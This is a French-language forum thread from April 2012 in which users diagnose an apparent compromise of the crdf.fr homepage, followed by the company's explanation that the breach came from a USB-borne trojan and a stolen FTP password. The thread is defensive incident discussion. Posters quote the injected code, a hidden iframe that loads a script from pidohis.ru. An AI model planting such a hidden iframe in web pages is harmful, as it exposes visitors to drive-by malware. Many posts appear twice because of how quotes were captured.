Crdf.fr Infecté ?
le barbier fou
17 avril 2012
Salut !
Je viens de remarquer que plusieurs sous-domaines de crdf.fr (dont threatcenter.crdf.fr) sont inaccessibles.
La page d'accueil du site, elle, ne semble pas être en odeur de sainteté auprès de Chromium :
La page contient en fait un iframe appelant un script PHP hébergé chez pidohis.ru...
Ce qui a pour effet d'exécuter un applet Java...
Ça ne sent pas bon, et ça ne vient pas de mes aisselles. A priori.
Quelqu'un a des infos ?
Bonne soirée à tous !
Je viens de remarquer que plusieurs sous-domaines de crdf.fr (dont threatcenter.crdf.fr) sont inaccessibles.
La page d'accueil du site, elle, ne semble pas être en odeur de sainteté auprès de Chromium :
La page contient en fait un iframe appelant un script PHP hébergé chez pidohis.ru...
Ce qui a pour effet d'exécuter un applet Java...
Ça ne sent pas bon, et ça ne vient pas de mes aisselles. A priori.
Quelqu'un a des infos ?
Bonne soirée à tous !
vigen
17 avril 2012
Salut Barbier comment va???
Ecoute je n'arrive plus a acceder au "ThreatCenter", il y'avais un message "d'accueil" spécifiant leur retour le 19/04.
J'ai papoter avec Saachaa qui est hébergé chez eux (crdf.net)
C'est la deuxième fois en peu de temps que leur serveurs sont inacessibles.
Pour moi CRDF.fr y'a pas de soucis ni d'applet java ce lançant (je viens d'essayer)!!!
(Firefox)
Ce message a été modifié par vigen - 17 avril 2012 - 22:02 .
Ecoute je n'arrive plus a acceder au "ThreatCenter", il y'avais un message "d'accueil" spécifiant leur retour le 19/04.
J'ai papoter avec Saachaa qui est hébergé chez eux (crdf.net)
C'est la deuxième fois en peu de temps que leur serveurs sont inacessibles.
Pour moi CRDF.fr y'a pas de soucis ni d'applet java ce lançant (je viens d'essayer)!!!
(Firefox)
Ce message a été modifié par vigen - 17 avril 2012 - 22:02 .
manzai
17 avril 2012
Le site de crdf.fr n'as pas de soucis
Le ThreatCenter & le site de Saachaa sont innacessible.
VirusTotal dit rien d'anormal pourtant : https://www.virustot...sis/1334697076/ et https://www.virustot...sis/1334697236/
Ce message a été modifié par manzai - 17 avril 2012 - 22:14 .
Le ThreatCenter & le site de Saachaa sont innacessible.
VirusTotal dit rien d'anormal pourtant : https://www.virustot...sis/1334697076/ et https://www.virustot...sis/1334697236/
Ce message a été modifié par manzai - 17 avril 2012 - 22:14 .
le barbier fou
17 avril 2012
Plutôt bien, merci.Salut Barbier comment va???
Quoique, d'après ce que vous me dites, le soucis viendrait de chez moi. ^^ C'est dérangeant.
Avez-vous cette ligne dans le code source de la page ? :
<iframe src="http://pidohis.ru/count13.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px; " width="10" height="10"></iframe>
Ce message a été modifié par le barbier fou - 17 avril 2012 - 22:24 .
le barbier fou
17 avril 2012
Le rapport Anubis le confirme, il y a bien une requête vers pidohis.ru (qui n'a rien à faire là). Peut-être n'aboutit-elle pas, vu que le chargement se termine par un timeout.
Ce message a été modifié par le barbier fou - 17 avril 2012 - 22:31 .
Ce message a été modifié par le barbier fou - 17 avril 2012 - 22:31 .
vigen
17 avril 2012
Le rapport Anubis le confirme, il y a bien une requête vers pidohis.ru (qui n'a rien à faire là). Peut-être n'aboutit-elle pas, vu que le chargement se termine par un timeout.
Oui j'ai bien aussi la requete, (Firefox, firebug comme éditeur) :
"<iframe width="10" height="10" src="http://pidohis.ru/count13.php" style="visibility: hidden; position: absolute; left: 0pt; top: 0pt;"></iframe>
<html xmlns="http://www.w3.org/1999/xhtml" class="blacklist">
<head>
<link rel="stylesheet" href="chrome://global/skin/netError.css" type="text/css" media="all"/>
<link rel="icon" type="image/png" id="favicon" href="chrome://global/skin/icons/blacklist_favicon.png"/>
Ce message a été modifié par vigen - 17 avril 2012 - 22:44 .
vigen
17 avril 2012
Oui.
Ce devait etre la réponse pour Adblock, mais j'ai édité entre temps vu que j'ai trouver la ligne dans le code de la page !!!
le barbier fou
17 avril 2012
Oui.
Oui.
Oui.
Ce devait etre la réponse pour Adblock, mais j'ai édité entre temps vu que j'ai trouver la ligne dans le code de la page !!!
Oui.
vigen
17 avril 2012
En tous cas bien vu l'aveugle !!!!
Pour Firefox tous vas bien ^^ (pour crdf.fr)
Si l'on va sur: http://pidohis.ru/count13.php la page "malveillante", Firefox la bloque ainsi que WOT.
En fouinant un peu on trouve ça:
http://jsunpack.jeek...e52be5ff21080a0
Bref, je te confirme Barbier ce n'était pas tes aisselles !!!
Ce message a été modifié par vigen - 17 avril 2012 - 23:26 .
Pour Firefox tous vas bien ^^ (pour crdf.fr)
Si l'on va sur: http://pidohis.ru/count13.php la page "malveillante", Firefox la bloque ainsi que WOT.
En fouinant un peu on trouve ça:
http://jsunpack.jeek...e52be5ff21080a0
Bref, je te confirme Barbier ce n'était pas tes aisselles !!!
Ce message a été modifié par vigen - 17 avril 2012 - 23:26 .
le barbier fou
18 avril 2012
Ouf ! 
CRDF sont au courant de ça ?
Le site pidohis.ru est à fuir, c'est certain. Il est néanmoins difficile de deviner ce que fait exactement le javascript - puisqu'apparemment c'en est un. Je n'ai plus d'applet Java qui se lance, la requête vers pidohis ne semble plus aboutir (timeout).
CRDF sont au courant de ça ?
Le site pidohis.ru est à fuir, c'est certain. Il est néanmoins difficile de deviner ce que fait exactement le javascript - puisqu'apparemment c'en est un. Je n'ai plus d'applet Java qui se lance, la requête vers pidohis ne semble plus aboutir (timeout).
vigen
18 avril 2012
Je pense qu'ils doivent l'etre...Vu leurs soucis....Simple supposition en meme temps ^^
Un ptit edit a 03h20 du mat
J'ai tenter avec opéra, java a tenter de se connecter, alerte de connection du pare-feu de DrWeb Heureusement qu'il est pas automatique celui là !!!
Ce message a été modifié par vigen - 18 avril 2012 - 02:22 .
Un ptit edit a 03h20 du mat
J'ai tenter avec opéra, java a tenter de se connecter, alerte de connection du pare-feu de DrWeb
Heureusement qu'il est pas automatique celui là !!!
Ce message a été modifié par vigen - 18 avril 2012 - 02:22 .
noisette
18 avril 2012
Désolé de dire ça, mais ces hébergeurs de taille "modeste", ils sont sympas, ils sont attendrissants, mais faut éviter, juste éviter.
vigen
18 avril 2012
L'adresse: http://pidohis.ru/count13.php génére un blocage de Spidergate depuis ce matin !!!! (Et donc quand l'on se rend chez CRDF le script est bloqué!!)
Sur ce coup là, l'api de google a bien fait son boulot, car sous Firefox ou Opéra, pas d'alerte du navigateur.
Ce message a été modifié par vigen - 18 avril 2012 - 09:45 .
(Et donc quand l'on se rend chez CRDF le script est bloqué!!)Sur ce coup là, l'api de google a bien fait son boulot, car sous Firefox ou Opéra, pas d'alerte du navigateur.
Ce message a été modifié par vigen - 18 avril 2012 - 09:45 .
loumax
18 avril 2012
L'adresse: http://pidohis.ru/count13.php génére un blocage de Spidergate depuis ce matin !!!!
Sur ce coup là, l'api de google a bien fait son boulot, car sous Firefox ou Opéra, pas d'alerte du navigateur.
Si si
blocking.PNG 38,47 Ko
6 Nombre de téléchargements http://pidohis.ru/count13.php
vigen
18 avril 2012
Oui quand on va directement sur le lien
J'en parlé "ce matin" avec Le Barbier, mais quand tu va sur la page CRDF.fr rien.....Alors qu'en éditant avec Dragonfly, l'Iframe découvert par Le Barbier est bien toujours présent.
Ce message a été modifié par vigen - 18 avril 2012 - 10:29 .
J'en parlé "ce matin" avec Le Barbier, mais quand tu va sur la page CRDF.fr rien.....Alors qu'en éditant avec Dragonfly, l'Iframe découvert par Le Barbier est bien toujours présent.
Ce message a été modifié par vigen - 18 avril 2012 - 10:29 .
ractamard
18 avril 2012
Le site de crdf.fr n'as pas de soucis
Le ThreatCenter & le site de Saachaa sont innacessible.
Pour le site de Saachaa, il a changer d'addresse : http://www.security-helpzone.com/
manzai
18 avril 2012
Le site de crdf.fr n'as pas de soucis
Le ThreatCenter & le site de Saachaa sont innacessible.
Pour le site de Saachaa, il a changer d'addresse : http://www.security-helpzone.com/
Merci pour le lien
le barbier fou
19 avril 2012
L'iframe indésirable n'est plus. Disparu aussi innocemment qu'il était venu.
Deux enseignements, au moins, peuvent en être tirés :
et surtout :
Deux enseignements, au moins, peuvent en être tirés :
Sur ce coup là, l'api de google a bien fait son boulot, car sous Firefox ou Opéra, pas d'alerte du navigateur.
et surtout :
Désolé de dire ça, mais ces hébergeurs de taille "modeste", ils sont sympas, ils sont attendrissants, mais faut éviter, juste éviter.
noisette
19 avril 2012
Quand on imagine les loustics qu'on peut trouver sur le net, c'est clair que techniquement, personne n'est à l'abri, mais d'avoir un hébergeur possédant de gros ressorts techniques en sécurité, même si ce n'est pas imparable, c'est déjà ça.
Je suis un peu vert de devoir le dire, mon naturel me faisant plutôt pencher pour les petites structures, les petites équipes, voire les activités individuelles, mais pour un hébergement, c'est chaud.
Je suis un peu vert de devoir le dire, mon naturel me faisant plutôt pencher pour les petites structures, les petites équipes, voire les activités individuelles, mais pour un hébergement, c'est chaud.
crdffrance
22 avril 2012
Bonjour à tous,
Tout d'abord, je tiens à vous remercier de l'intérêt que vous portez aux services de CRDF France et à ses produits. Nous avons rencontré quelques difficultées en ce moment à la suite d'une fuite d'information par un virus via une clé USB connectée sur notre réseau qui contenait un Trojan-Downloader.Win32. Seul le domaine "crdf.fr" et son serveur a été touché (hébergement mutualisé OVH) par cette attaque. L'auteur de cette attaque malveillante n'avait que pour but de générer du gain et celui-ci n'a exploité aucune faille de nos serveurs, il avait tout simplement le mot de passe d'un de nos serveurs FTP.
Le problème a été définitivement réglé. Nous déplaçons actuellement nos serveurs vers une autre infrastructure chez un hébergeur concurent. Notre priorité était donc de rétablir nos clients et non les sites Web à faible audience (c.f securityhelpzone).
> Désolé de dire ça, mais ces hébergeurs de taille "modeste", ils sont sympas, ils sont attendrissants, mais faut éviter, juste éviter.
Je tiens à dire que le serveur qui a été "piraté" (c'est un bien grand mot) est un serveur mutualisé OVH. Pour preuve, personne n'est à l'abri d'une faille de sécurité, d'un virus informatique ou d'un vol de données. C'est le risque à prendre sur internet. De plus, il n'y pas eu d'exploitation de failles sur l'une de nos applications.
Moralité : nous renforçons encore une fois la sécurité sur toutes nos infrastructures.
Cordialement,
Patrick,
Ce message a été modifié par crdffrance - 22 avril 2012 - 11:03 .
Tout d'abord, je tiens à vous remercier de l'intérêt que vous portez aux services de CRDF France et à ses produits. Nous avons rencontré quelques difficultées en ce moment à la suite d'une fuite d'information par un virus via une clé USB connectée sur notre réseau qui contenait un Trojan-Downloader.Win32. Seul le domaine "crdf.fr" et son serveur a été touché (hébergement mutualisé OVH) par cette attaque. L'auteur de cette attaque malveillante n'avait que pour but de générer du gain et celui-ci n'a exploité aucune faille de nos serveurs, il avait tout simplement le mot de passe d'un de nos serveurs FTP.
Le problème a été définitivement réglé. Nous déplaçons actuellement nos serveurs vers une autre infrastructure chez un hébergeur concurent. Notre priorité était donc de rétablir nos clients et non les sites Web à faible audience (c.f securityhelpzone).
> Désolé de dire ça, mais ces hébergeurs de taille "modeste", ils sont sympas, ils sont attendrissants, mais faut éviter, juste éviter.
Je tiens à dire que le serveur qui a été "piraté" (c'est un bien grand mot) est un serveur mutualisé OVH. Pour preuve, personne n'est à l'abri d'une faille de sécurité, d'un virus informatique ou d'un vol de données. C'est le risque à prendre sur internet. De plus, il n'y pas eu d'exploitation de failles sur l'une de nos applications.
Moralité : nous renforçons encore une fois la sécurité sur toutes nos infrastructures.
Cordialement,
Patrick,
Ce message a été modifié par crdffrance - 22 avril 2012 - 11:03 .
noisette
22 avril 2012
Bonjour Patrick,
bon, je comprends ton point de vue, et ta réaction, mais enfin: piraté, cela reste le mot, d'après ce que tu décris. Votre réseau est une infrastructure (logicielle) sous votre responsabilité, j'imagine, et non fournie par OVH, qui héberge. Dis-moi si je me trompe, mais je n'ai pas connaissance qu'OVH offre la prestation complète que tu décris. Et le service que vous rendez, c'est bien du cloud, donc un hébergement. Et c'est là qu'il y a eu faille.
A mon sens, la sécurisation des hébergements n'est jamais sûre à 100%, même chez OVH. J'en ai parfaitement conscience. Mais à ma connaissance, la plupart des piratages résultent de failles laissées non par eux, mais par les hébergés.
Je suis persuadé que sur le sujet de la sécurisation des hébergements, plus il y a de compétences, mieux c'est, et en ce sens, sur un sujet comme la sécurisation plus que dans d'autres, c'est à la faveur de ceux qui peuvent se payer et mettre en œuvre ces compétences.
Je n'ai pas dit que c'est conforme à ma "philosophie", mais je constate que seuls les gros ou presque arrivent à suivre sur ce sujet.
Bon, il y a des exceptions en tout, et mon intention n'est pas de te froisser, ni toi ni ton équipe. Je dis juste, chacun son taf. Votre action est tournée vers autre chose, de très louable au passage (je vous connais surtout par threatcenter - le cloud, je ne suis pas hyper chaud), ce n'est pas sans rapport, mais c'est autre chose, et l'essentiel, c'est que vous soyez bon dans votre domaine.
Je conclue tout de même en rappelant que ça nous est arrivé aussi, chez ovh aussi, mais il semble, après quelques investigations, que la faute était notre. Un truc pas à jour.
bon, je comprends ton point de vue, et ta réaction, mais enfin: piraté, cela reste le mot, d'après ce que tu décris. Votre réseau est une infrastructure (logicielle) sous votre responsabilité, j'imagine, et non fournie par OVH, qui héberge. Dis-moi si je me trompe, mais je n'ai pas connaissance qu'OVH offre la prestation complète que tu décris. Et le service que vous rendez, c'est bien du cloud, donc un hébergement. Et c'est là qu'il y a eu faille.
A mon sens, la sécurisation des hébergements n'est jamais sûre à 100%, même chez OVH. J'en ai parfaitement conscience. Mais à ma connaissance, la plupart des piratages résultent de failles laissées non par eux, mais par les hébergés.
Je suis persuadé que sur le sujet de la sécurisation des hébergements, plus il y a de compétences, mieux c'est, et en ce sens, sur un sujet comme la sécurisation plus que dans d'autres, c'est à la faveur de ceux qui peuvent se payer et mettre en œuvre ces compétences.
Je n'ai pas dit que c'est conforme à ma "philosophie", mais je constate que seuls les gros ou presque arrivent à suivre sur ce sujet.
Bon, il y a des exceptions en tout, et mon intention n'est pas de te froisser, ni toi ni ton équipe. Je dis juste, chacun son taf. Votre action est tournée vers autre chose, de très louable au passage (je vous connais surtout par threatcenter - le cloud, je ne suis pas hyper chaud), ce n'est pas sans rapport, mais c'est autre chose, et l'essentiel, c'est que vous soyez bon dans votre domaine.
Je conclue tout de même en rappelant que ça nous est arrivé aussi, chez ovh aussi, mais il semble, après quelques investigations, que la faute était notre. Un truc pas à jour.
crdffrance
22 avril 2012
> bon, je comprends ton point de vue, et ta réaction, mais enfin: piraté, cela reste le mot, d'après ce que tu décris. Votre réseau est une infrastructure (logicielle) sous votre responsabilité, j'imagine, et non fournie par OVH, qui héberge. Dis-moi si je me trompe, mais je n'ai pas connaissance qu'OVH offre la prestation complète que tu décris. Et le service que vous rendez, c'est bien du cloud, donc un hébergement. Et c'est là qu'il y a eu faille.
Les serveurs de CRDF Cloud n'ont pas été touchés, c'est d'ailleurs pour ça que j'ai bien précisé (crdf.fr). Notre site Web portail est hébergé sur un serveur mutualisé. Je tiens à préciser que les serveurs de CRDF Cloud sont très sécurisés.
> A mon sens, la sécurisation des hébergements n'est jamais sûre à 100%, même chez OVH. J'en ai parfaitement conscience. Mais à ma connaissance, la plupart des piratages résultent de failles laissées non par eux, mais par les hébergés.
En effet. Il y a des failles partout.
> Bon, il y a des exceptions en tout, et mon intention n'est pas de te froisser, ni toi ni ton équipe. Je dis juste, chacun son taf. Votre action est tournée vers autre chose, de très louable au passage (je vous connais surtout par threatcenter - le cloud, je ne suis pas hyper chaud), ce n'est pas sans rapport, mais c'est autre chose, et l'essentiel, c'est que vous soyez bon dans votre domaine.
Je te remercie. Nous essayons d'être efficace.
Je pense que vous avons réagis très rapidement à ce problème sur notre site Internet. Tout est réglé et sécurisé.
Si vous avez d'éventuelles questions, merci de nous contacter à clients@crdf.fr.
Cordialement,
Patrick,
Ce message a été modifié par crdffrance - 22 avril 2012 - 13:34 .
Les serveurs de CRDF Cloud n'ont pas été touchés, c'est d'ailleurs pour ça que j'ai bien précisé (crdf.fr). Notre site Web portail est hébergé sur un serveur mutualisé. Je tiens à préciser que les serveurs de CRDF Cloud sont très sécurisés.
> A mon sens, la sécurisation des hébergements n'est jamais sûre à 100%, même chez OVH. J'en ai parfaitement conscience. Mais à ma connaissance, la plupart des piratages résultent de failles laissées non par eux, mais par les hébergés.
En effet. Il y a des failles partout.
> Bon, il y a des exceptions en tout, et mon intention n'est pas de te froisser, ni toi ni ton équipe. Je dis juste, chacun son taf. Votre action est tournée vers autre chose, de très louable au passage (je vous connais surtout par threatcenter - le cloud, je ne suis pas hyper chaud), ce n'est pas sans rapport, mais c'est autre chose, et l'essentiel, c'est que vous soyez bon dans votre domaine.
Je te remercie. Nous essayons d'être efficace.
Je pense que vous avons réagis très rapidement à ce problème sur notre site Internet. Tout est réglé et sécurisé.
Si vous avez d'éventuelles questions, merci de nous contacter à clients@crdf.fr.
Cordialement,
Patrick,
Ce message a été modifié par crdffrance - 22 avril 2012 - 13:34 .
manzai
22 avril 2012
Bonjour CRDF France,
Je voudrais savoir si votre site a l'adresse http://threatcenter.crdf.fr/ a été corrigé?
Merci pour votre réponse
Je voudrais savoir si votre site a l'adresse http://threatcenter.crdf.fr/ a été corrigé?
Merci pour votre réponse
